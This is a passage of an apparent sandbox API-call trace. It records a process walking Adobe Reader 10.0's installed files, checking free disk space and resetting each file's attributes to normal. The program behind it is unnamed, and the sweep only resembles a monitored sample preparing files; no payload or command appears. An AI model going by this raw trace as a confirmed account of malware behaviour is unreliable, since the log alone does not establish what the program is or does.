lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.792] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.795] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.795] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.795] CoTaskMemFree (pv=0x506980) [0107.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.797] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.815] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.818] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.834] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.837] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.837] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.838] CoTaskMemFree (pv=0x506980) [0107.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.838] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.846] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.848] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.858] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.861] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.861] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.861] CoTaskMemFree (pv=0x506980) [0107.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.862] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.867] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.869] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.877] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.879] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.879] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.879] CoTaskMemFree (pv=0x506980) [0107.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.880] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.891] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.894] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.908] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.911] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.911] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.911] CoTaskMemFree (pv=0x506980) [0107.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.912] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.921] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.924] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.941] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.944] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.944] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.945] CoTaskMemFree (pv=0x506980) [0107.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.946] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.952] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.954] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.962] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.964] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.964] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.964] CoTaskMemFree (pv=0x506980) [0107.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.965] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.972] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.975] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.985] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0107.988] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0107.988] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0107.988] CoTaskMemFree (pv=0x506980) [0107.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0107.988] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0107.996] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0107.999] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.010] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0108.012] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.013] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.013] CoTaskMemFree (pv=0x506980) [0108.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.014] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.046] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0108.050] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.088] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0108.093] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.093] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.093] CoTaskMemFree (pv=0x506980) [0108.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.094] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.103] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\AdobeID.pdf", dwFileAttributes=0x80) returned 1 [0108.106] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.138] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\DefaultID.pdf", dwFileAttributes=0x80) returned 1 [0108.143] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.143] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.143] CoTaskMemFree (pv=0x506980) [0108.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.144] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.144] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.144] CoTaskMemFree (pv=0x506980) [0108.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.147] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.147] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.148] CoTaskMemFree (pv=0x506980) [0108.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.150] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.157] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\license.html", dwFileAttributes=0x80) returned 1 [0108.159] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.159] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.159] CoTaskMemFree (pv=0x506980) [0108.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.161] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.169] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\license.html", dwFileAttributes=0x80) returned 1 [0108.171] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.171] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.171] CoTaskMemFree (pv=0x506980) [0108.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.172] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.181] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\license.html", dwFileAttributes=0x80) returned 1 [0108.184] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.184] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.184] CoTaskMemFree (pv=0x506980) [0108.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.185] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.193] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\license.html", dwFileAttributes=0x80) returned 1 [0108.195] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.195] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.195] CoTaskMemFree (pv=0x506980) [0108.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.197] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.204] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\license.html", dwFileAttributes=0x80) returned 1 [0108.206] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.206] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.206] CoTaskMemFree (pv=0x506980) [0108.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.207] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.213] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\license.html", dwFileAttributes=0x80) returned 1 [0108.215] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.215] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.215] CoTaskMemFree (pv=0x506980) [0108.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.216] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.223] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\license.html", dwFileAttributes=0x80) returned 1 [0108.226] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.226] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.226] CoTaskMemFree (pv=0x506980) [0108.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.227] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.236] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\license.html", dwFileAttributes=0x80) returned 1 [0108.238] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.238] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.238] CoTaskMemFree (pv=0x506980) [0108.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.239] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.245] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\license.html", dwFileAttributes=0x80) returned 1 [0108.247] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.247] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.248] CoTaskMemFree (pv=0x506980) [0108.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.249] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.256] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\license.html", dwFileAttributes=0x80) returned 1 [0108.258] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.258] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.258] CoTaskMemFree (pv=0x506980) [0108.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.260] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.267] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV\\license.html", dwFileAttributes=0x80) returned 1 [0108.270] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.270] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.270] CoTaskMemFree (pv=0x506980) [0108.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.270] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0108.278] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\license.html", dwFileAttributes=0x80) returned 1 [0108.280] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.281] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.281] CoTaskMemFree (pv=0x506980) [0108.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.282] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, 